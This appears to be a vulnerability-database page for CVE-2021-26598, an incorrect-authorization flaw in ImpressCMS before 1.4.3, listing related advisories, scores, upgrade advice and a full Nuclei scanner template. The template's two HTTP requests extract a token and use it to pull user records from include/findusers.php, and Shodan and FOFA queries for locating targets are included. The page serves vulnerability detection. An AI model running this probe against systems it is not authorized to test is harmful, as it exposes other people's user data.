Lucene search
+L

ImpressCMS <1.4.3 - Incorrect Authorization

🗓️ 01 Aug 2026 10:03:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 70 Views

ImpressCMS <1.4.3 - Incorrect Authorization. Vulnerability allows unauthorized access and actions. Upgrade to version 1.4.3

Related
Refs
Code
ReporterTitlePublishedViews
Family
zdt
zdt
ImpressCMS 1.4.2 Incorrect Access Control Vulnerability
23 Mar 202200:00
zdt
zdt
zdt
ImpressCMS 1.4.2 - Remote Code Execution Exploit
30 Mar 202200:00
zdt
attackerkb
ATTACKERKB
CVE-2021-26598
28 Mar 202201:15
attackerkb
circl
Circl
CVE-2021-26598
28 Mar 202207:39
circl
cnnvd
CNNVD
ImpressCMS 授权问题漏洞
22 Mar 202200:00
cnnvd
cnvd
CNVD
ImpressCMS Access Control Error Vulnerability
24 Mar 202200:00
cnvd
cve
CVE
CVE-2021-26598
28 Mar 202200:31
cve
cvelist
Cvelist
CVE-2021-26598
28 Mar 202200:31
cvelist
exploitdb
Exploit DB
ImpressCMS 1.4.2 - Remote Code Execution (RCE)
30 Mar 202200:00
exploitdb
github
Github Security Blog
Incorrect Access Control in ImpressCMS
29 Mar 202200:01
github
Rows per page
id: CVE-2021-26598

info:
  name: ImpressCMS <1.4.3 - Incorrect Authorization
  author: gy741,pdteam
  severity: medium
  description: ImpressCMS before 1.4.3 is susceptible to incorrect authorization via include/findusers.php. An attacker can provide a security token and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can bypass authorization and gain unauthorized access to sensitive information or perform unauthorized actions.
  remediation: |
    Upgrade to ImpressCMS version 1.4.3 or later to fix the vulnerability.
  reference:
    - https://hackerone.com/reports/1081137
    - http://karmainsecurity.com/KIS-2022-03
    - https://github.com/ImpressCMS
    - https://nvd.nist.gov/vuln/detail/CVE-2021-26598
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2021-26598
    cwe-id: CWE-287
    epss-score: 0.10528
    epss-percentile: 0.95306
    cpe: cpe:2.3:a:impresscms:impresscms:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: impresscms
    product: impresscms
    shodan-query:
      - http.html:"ImpressCMS"
      - cpe:"cpe:2.3:a:impresscms:impresscms"
      - http.html:"impresscms"
    fofa-query: body="impresscms"
  tags: cve,cve2021,hackerone,impresscms,unauth,cms,vuln

http:
  - raw:
      - |
        GET /misc.php?action=showpopups&type=friend HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
      - |
        GET /include/findusers.php?token={{token}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - 'last_login'
          - 'user_regdate'
          - 'uname'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: token
        group: 1
        regex:
          - "REQUEST' value='(.*?)'"
          - 'REQUEST" value="(.*?)"'
        internal: true
# digest: 4a0a0047304502210099e5fb93f7a48b4284bfdf87b4cecc8b603e870460da1e6096ad52992f05989102201ead79b57555348c4efb7e126b14955c5778034766d82f4405ebc80c2f9a72a1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 25
CVSS 3.15.3
EPSS0.10528
70